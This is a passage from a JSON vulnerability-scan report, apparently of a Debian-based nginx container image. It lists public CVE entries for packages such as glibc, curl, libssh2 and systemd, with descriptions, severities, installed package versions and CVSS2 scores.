"CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5.8"}]}, {"name": "CVE-2019-12290", "description": "GNU libidn2 before 2.2.0 fails to perform the roundtrip checks specified in RFC3490 Section 4.2 when converting A-labels to U-labels. This makes it possible in some circumstances for one domain to impersonate another. 
By creating a malicious domain that matches a target domain except for the inclusion of certain punycoded Unicode characters (that would be discarded when converted first to a Unicode label and then back to an ASCII label), arbitrary domains can be impersonated.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-12290", "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "2.0.5-1+deb10u1"}, {"key": "package_name", "value": "libidn2"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2019-13115", "description": "In libssh2 before 1.9.0, kex_method_diffie_hellman_group_exchange_sha256_key_exchange in kex.c has an integer overflow that could lead to an out-of-bounds read in the way packets are read from the server. A remote attacker who compromises a SSH server may be able to disclose sensitive information or cause a denial of service condition on the client system when a user connects to the server. 
This is related to an _libssh2_check_length mistake, and is different from the various issues fixed in 1.8.1, such as CVE-2019-3855.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-13115", "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "1.8.0-2.1"}, {"key": "package_name", "value": "libssh2"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5.8"}]}, {"name": "CVE-2016-9318", "description": "libxml2 2.9.4 and earlier, as used in XMLSec 1.2.23 and earlier and other products, does not offer a flag directly indicating that the current document may be read but other files may not be opened, which makes it easier for remote attackers to conduct XML External Entity (XXE) attacks via a crafted document.", "uri": "https://security-tracker.debian.org/tracker/CVE-2016-9318", "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "2.9.4+dfsg1-7+deb10u2"}, {"key": "package_name", "value": "libxml2"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name": "CVE-2017-16932", "description": "parser.c in libxml2 before 2.9.5 does not prevent infinite recursion in parameter entities.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-16932", "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "2.9.4+dfsg1-7+deb10u2"}, {"key": "package_name", "value": "libxml2"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2020-36309", "description": "ngx_http_lua_module (aka lua-nginx-module) before 0.10.16 in OpenResty allows unsafe characters in an argument when using the
- API to mutate a URI, or a request or response header.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-36309", "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "1.21.1-1~buster"}, {"key": "package_name", "value": "nginx"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2020-14155", "description": "libpcre in PCRE before 8.44 allows an integer overflow via a large number after a (?C substring.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-14155", "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "2:8.39-12"}, {"key": "package_name", "value": "pcre3"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2019-3843", "description": "It was discovered that a systemd service that uses DynamicUser property can create a SUID/SGID binary that would be allowed to run as the transient service UID/GID even after the service is terminated. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the UID/GID will be recycled.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-3843", "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "241-7~deb10u8"}, {"key": "package_name", "value": "systemd"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "4.6"}]}, {"name": "CVE-2019-3844", "description": "It was discovered that a systemd service that uses DynamicUser property can get new privileges through the execution of SUID binaries, which would allow to create binaries owned by the service transient group with the setgid bit set. 
A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the GID will be recycled.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-3844", "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "241-7~deb10u8"}, {"key": "package_name", "value": "systemd"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "4.6"}]}, {"name": "CVE-2016-2781", "description": "chroot in GNU coreutils, when used with --userspec, allows local users to escape to the parent session via a crafted TIOCSTI ioctl call, which pushes characters to the terminal''s input buffer.", "uri": "https://security-tracker.debian.org/tracker/CVE-2016-2781", "severity": "LOW", "attributes": [{"key": "package_version", "value": "8.30-3"}, {"key": "package_name", "value": "coreutils"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}, {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name": "CVE-2021-22898", "description": "curl 7.7 through 7.76.1 suffers from an information disclosure when the `-t` command line option, known as `CURLOPT_TELNETOPTIONS` in libcurl, is used to send variable=content pairs to TELNET servers. 
Due to a flaw in the option parser for sending NEW_ENV variables, libcurl could be made to pass on uninitialized data from a stack based buffer to the server, resulting in potentially revealing sensitive internal information to the server using a clear-text network protocol.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-22898", "severity": "LOW", "attributes": [{"key": "package_version", "value": "7.64.0-4+deb10u2"}, {"key": "package_name", "value": "curl"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "2.6"}]}, {"name": "CVE-2019-15847", "description": "The POWER9 backend in GNU Compiler Collection (GCC) before version 10 could optimize multiple calls of the __builtin_darn intrinsic into a single call, thus reducing the entropy of the random number generator. This occurred because a volatile operation was not specified. For example, within a single execution of a program, the output of every __builtin_darn() call may be the same.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-15847", "severity": "LOW", "attributes": [{"key": "package_version", "value": "8.3.0-6"}, {"key": "package_name", "value": "gcc-8"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2020-1752", "description": "A use-after-free vulnerability introduced in glibc upstream version 2.14 was found in the way the tilde expansion was carried out. Directory paths containing an initial tilde followed by a valid username were affected by this issue. A local attacker could exploit this flaw by creating a specially crafted path that, when processed by the glob function, would potentially lead to arbitrary code execution. 
This was fixed in version 2.32.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-1752", "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "3.7"}]}, {"name": "CVE-2020-6096", "description": "An exploitable signed comparison vulnerability exists in the ARMv7 memcpy() implementation of GNU glibc 2.30.9000. Calling memcpy() (on ARMv7 targets that utilize the GNU glibc implementation) with a negative value for the ''num'' parameter results in a signed comparison vulnerability. If an attacker underflows the ''num'' parameter to memcpy(), this vulnerability could lead to undefined behavior such as writing to out-of-bounds memory and potentially remote code execution. Furthermore, this memcpy() implementation allows for program execution to continue in scenarios where a segmentation fault or crash should have occurred. The dangers occur in that subsequent execution and iterations of this code will be executed with this corrupted data.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-6096", "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "6.8"}]}, {"name": "CVE-2020-10029", "description": "The GNU C Library (aka glibc or libc6) before 2.32 could overflow an on-stack buffer during range reduction if an input to an 80-bit long double function contains a non-canonical bit pattern, a seen when passing a 0x5d414141414141410000 value to sinl on x86 targets. 
This is related to sysdeps/ieee754/ldbl-96/e_rem_pio2l.c.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-10029", "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name": "CVE-2020-27618", "description": "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid multi-byte input sequences in IBM1364, IBM1371, IBM1388, IBM1390, and IBM1399 encodings, fails to advance the input state, which could lead to an infinite loop in applications, resulting in a denial of service, a different vulnerability from CVE-2016-10228.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-27618", "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name": "CVE-2016-10228", "description": "The iconv program in the GNU C Library (aka glibc or libc6) 2.31 and earlier, when invoked with multiple suffixes in the destination encoding (TRANSLATE or IGNORE) along with the -c option, enters an infinite loop when processing invalid multi-byte input sequences, leading to a denial of service.", "uri": "https://security-tracker.debian.org/tracker/CVE-2016-10228", "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name": "CVE-2019-19126", "description": "On the x86-64 architecture, the GNU C Library (aka glibc) before 2.31 fails to ignore the LD_PREFER_MAP_32BIT_EXEC environment variable during program execution after a security transition, allowing local attackers to restrict the possible mapping 
addresses for loaded libraries and thus bypass ASLR for a setuid program.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-19126", "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name": "CVE-2021-27645", "description": "The nameserver caching daemon (nscd) in the GNU C Library (aka glibc or libc6) 2.29 through 2.33, when processing a request for netgroup lookup, may crash due to a double-free, potentially resulting in degraded service or Denial of Service on the local system. This is related to netgroupcache.c.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-27645", "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "1.9"}]}, {"name": "CVE-2019-14855", "description": "A flaw was found in the way certificate signatures could be forged using collisions found in the SHA-1 algorithm. An attacker could use this weakness to create forged certificate signatures. This issue affects GnuPG versions before 2.2.18.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-14855", "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.2.12-1+deb10u1"},
- {"key": "package_name", "value": "gnupg2"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2019-13627", "description": "It was discovered that there was a ECDSA timing attack in the libgcrypt20 cryptographic library. Version affected: 1.8.4-5, 1.7.6-2+deb9u3, and 1.6.3-2+deb8u4. Versions fixed: 1.8.5-2 and 1.6.3-2+deb8u7.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-13627", "severity": "LOW", "attributes": [{"key": "package_version", "value": "1.8.4-5+deb10u1"}, {"key": "package_name", "value": "libgcrypt20"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:H/Au:N/C:P/I:P/A:N"}, {"key": "CVSS2_SCORE", "value": "2.6"}]}, {"name": "CVE-2018-14553", "description": "gdImageClone in gd.c in libgd 2.1.0-rc2 through 2.2.5 has a NULL pointer dereference allowing attackers to crash an application via a specific function call sequence. Only affects PHP when linked with an external libgd (not bundled).", "uri": "https://security-tracker.debian.org/tracker/CVE-2018-14553", "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.2.5-5.2"}, {"key": "package_name", "value": "libgd2"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2021-36086", "description": "The CIL compiler in SELinux 3.2 has a use-after-free in cil_reset_classpermission (called from cil_reset_classperms_set and cil_reset_classperms_list).", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-36086", "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.8-1"}, {"key": "package_name", "value": "libsepol"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name": "CVE-2021-36085", "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __verify_map_perm_classperms and hashtab_map).", "uri": 
"https://security-tracker.debian.org/tracker/CVE-2021-36085", "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.8-1"}, {"key": "package_name", "value": "libsepol"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name": "CVE-2021-36087", "description": "The CIL compiler in SELinux 3.2 has a heap-based buffer over-read in ebitmap_match_any (called indirectly from cil_check_neverallow). This occurs because there is sometimes a lack of checks for invalid statements in an optional block.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-36087", "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.8-1"}, {"key": "package_name", "value": "libsepol"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name": "CVE-2021-36084", "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __cil_verify_classpermission and __cil_pre_verify_helper).", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-36084", "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.8-1"}, {"key": "package_name", "value": "libsepol"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name": "CVE-2019-17498", "description": "In libssh2 v1.9.0 and earlier versions, the SSH_MSG_DISCONNECT logic in packet.c has an integer overflow in a bounds check, enabling an attacker to specify an arbitrary (out-of-bounds) offset for a subsequent memory read. 
A crafted SSH server may be able to disclose sensitive information or cause a denial of service condition on the client system when a user connects to the server.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-17498", "severity": "LOW", "attributes": [{"key": "package_version", "value": "1.8.0-2.1"}, {"key": "package_name", "value": "libssh2"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5.8"}]}, {"name": "CVE-2019-17543", "description": "LZ4 before 1.9.2 has a heap-based buffer overflow in LZ4_write32 (related to LZ4_compress_destSize), affecting applications that call LZ4_compress_fast with a large input. (This issue can also lead to data corruption.) NOTE: the vendor states \"only a few specific / uncommon usages of the API are at risk.\"", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-17543", "severity": "LOW", "attributes": [{"key": "package_version", "value": "1.8.3-1+deb10u1"}, {"key": "package_name", "value": "lz4"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "6.8"}]}, {"name": "CVE-2013-0337", "description": "The default configuration of nginx, possibly 1.3.13 and earlier, uses world-readable permissions for the (1) access.log and (2) error.log files, which allows local users to obtain sensitive information by reading the files.", "uri": "https://security-tracker.debian.org/tracker/CVE-2013-0337", "severity": "LOW", "attributes": [{"key": "package_version", "value": "1.21.1-1~buster"}, {"key": "package_name", "value": "nginx"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "7.5"}]}, {"name": "CVE-2018-7169", "description": "An issue was discovered in shadow 4.5. newgidmap (in shadow-utils) is setuid and allows an unprivileged user to be placed in a user namespace where setgroups(2) is permitted. 
This allows an attacker to remove themselves from a supplementary group, which may allow access to certain filesystem paths if the administrator has used \"group blacklisting\" (e.g., chmod g-rwx) to restrict access to paths. This flaw effectively reverts a security feature in the kernel (in particular, the /proc/self/setgroups knob) to prevent this sort of privilege escalation.", "uri": "https://security-tracker.debian.org/tracker/CVE-2018-7169", "severity": "LOW", "attributes": [{"key": "package_version", "value": "1:4.5-1.1"}, {"key": "package_name", "value": "shadow"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2021-37600", "description": "An integer overflow in util-linux through 2.37.1 can potentially cause a buffer overflow if an attacker were able to use system resources in a way that leads to a large number in the /proc/sysvipc/sem file.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-37600", "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.33.1-0.1"}, {"key": "package_name", "value": "util-linux"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "7.5"}]}, {"name": "CVE-2011-3374", "description": "It was found that apt-key in apt, all versions, do not correctly validate gpg keys with the master keyring, leading to a potential man-in-the-middle attack.", "uri": "https://security-tracker.debian.org/tracker/CVE-2011-3374", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1.8.2.3"}, {"key": "package_name", "value": "apt"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name": "CVE-2019-18276", "description": "An issue was discovered in disable_priv_mode in shell.c in GNU Bash through 5.0 patch 11. 
By default, if Bash is run with its effective UID not equal to its real UID, it will drop privileges by setting its effective UID to its real UID. However, it does so incorrectly. On Linux and other systems that support \"saved UID\" functionality, the saved UID is not dropped. An attacker with command execution in the shell can use \"enable -f\" for runtime loading of a new builtin, which can be a shared object that calls setuid() and therefore regains privileges. However, binaries running with an effective UID of 0 are unaffected.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-18276", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "5.0-4"}, {"key": "package_name", "value": "bash"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, {"key": "CVSS2_SCORE", "value": "7.2"}]}, {"name": "CVE-2017-18018", "description": "In GNU Coreutils through 8.29, chown-core.c in chown and chgrp does not prevent replacement of a plain file with a symlink during use of the POSIX \"-R -L\" options, which allows local users to modify the ownership of arbitrary files by leveraging a race condition.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-18018", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "8.30-3"}, {"key": "package_name", "value": "coreutils"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:M/Au:N/C:N/I:P/A:N"}, {"key": "CVSS2_SCORE", "value": "1.9"}]}, {"name": "CVE-2021-22923", "description": "When curl is instructed to get content using the metalink feature, and a user name and password are used to download the metalink XML file, those same credentials are then subsequently passed on to each of the servers from which curl will download or try to download the contents from. 
Often contrary to the user''s expectations and intentions and without telling the user it happened.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-22923", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "7.64.0-4+deb10u2"}, {"key": "package_name", "value": "curl"}]}, {"name": "CVE-2021-22922", "description": "When curl is instructed to download content using the metalink feature, thecontents is verified against a hash provided in the metalink XML file.The metalink XML file points out to the client how to get the same contentfrom a set of different URLs, potentially hosted by different servers and theclient can then download the file from one or several of them. In a serial orparallel manner.If one of the servers hosting
- the contents has been breached and the contentsof the specific file on that server is replaced with a modified payload, curlshould detect this when the hash of the file mismatches after a completeddownload. It should remove the contents and instead try getting the contentsfrom another URL. This is not done, and instead such a hash mismatch is onlymentioned in text and the potentially malicious content is kept in the file ondisk.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-22922", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "7.64.0-4+deb10u2"}, {"key": "package_name", "value": "curl"}]}, {"name": "CVE-2013-0340", "description": "expat 2.1.0 and earlier does not properly handle entities expansion unless an application developer uses the XML_SetEntityDeclHandler function, which allows remote attackers to cause a denial of service (resource consumption), send HTTP requests to intranet servers, or read arbitrary files via a crafted XML document, aka an XML External Entity (XXE) issue. NOTE: it could be argued that because expat already provides the ability to disable external entity expansion, the responsibility for resolving this issue lies with application developers; according to this argument, this entry should be REJECTed, and each affected application would need its own CVE.", "uri": "https://security-tracker.debian.org/tracker/CVE-2013-0340", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2.2.6-2+deb10u1"}, {"key": "package_name", "value": "expat"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "6.8"}]}, {"name": "CVE-2019-1010023", "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. 
ldd execute code. NOTE: Upstream comments indicate \"this is being treated as a non-security bug and no real threat.\"", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-1010023", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "6.8"}]}, {"name": "CVE-2010-4051", "description": "The regcomp implementation in the GNU C Library (aka glibc or libc6) through 2.11.3, and 2.12.x through 2.12.2, allows context-dependent attackers to cause a denial of service (application crash) via a regular expression containing adjacent bounded repetitions that bypass the intended RE_DUP_MAX limitation, as demonstrated by a {10,}{10,}{10,}{10,}{10,} sequence in the proftpd.gnu.c exploit for ProFTPD, related to a \"RE_DUP_MAX overflow.\"", "uri": "https://security-tracker.debian.org/tracker/CVE-2010-4051", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2019-1010022", "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. 
NOTE: Upstream comments indicate \"this is being treated as a non-security bug and no real threat.\"", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-1010022", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "7.5"}]}, {"name": "CVE-2010-4052", "description": "Stack consumption vulnerability in the regcomp implementation in the GNU C Library (aka glibc or libc6) through 2.11.3, and 2.12.x through 2.12.2, allows context-dependent attackers to cause a denial of service (resource exhaustion) via a regular expression containing adjacent repetition operators, as demonstrated by a {10,}{10,}{10,}{10,} sequence in the proftpd.gnu.c exploit for ProFTPD.", "uri": "https://security-tracker.debian.org/tracker/CVE-2010-4052", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2019-1010024", "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. 
NOTE: Upstream comments indicate \"this is being treated as a non-security bug and no real threat.\"", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-1010024", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2010-4756", "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", "uri": "https://security-tracker.debian.org/tracker/CVE-2010-4756", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "4"}]}, {"name": "CVE-2019-1010025", "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. 
NOTE: the vendor''s position is \"ASLR bypass itself is not a vulnerability.\"", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2018-20796", "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by ''(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+'' in grep.", "uri": "https://security-tracker.debian.org/tracker/CVE-2018-20796", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2019-9192", "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by ''(|)(\\\\1\\\\1)*'' in grep, a different issue than CVE-2018-20796. 
NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-9192", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2011-3389", "description": "The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a \"BEAST\" attack.", "uri": "https://security-tracker.debian.org/tracker/CVE-2011-3389", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "3.6.7-4+deb10u7"}, {"key": "package_name", "value": "gnutls28"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name": "CVE-2021-30535", "description": "Double free in ICU in Google Chrome prior to 91.0.4472.77 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-30535", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "63.1-6+deb10u1"}, {"key": "package_name", "value": "icu"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "6.8"}]}, {"name": "CVE-2017-9937", "description": "In LibTIFF 4.0.8, there is a memory malloc failure in tif_jbig.c. 
A crafted TIFF document can lead to an abort resulting in a remote denial of service attack.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-9937", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2.1-3.1"}, {"key": "package_name", "value": "jbigkit"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name": "CVE-2018-5709", "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable \"dbentry->n_key_data\" in kadmin/dbutil/dump.c that
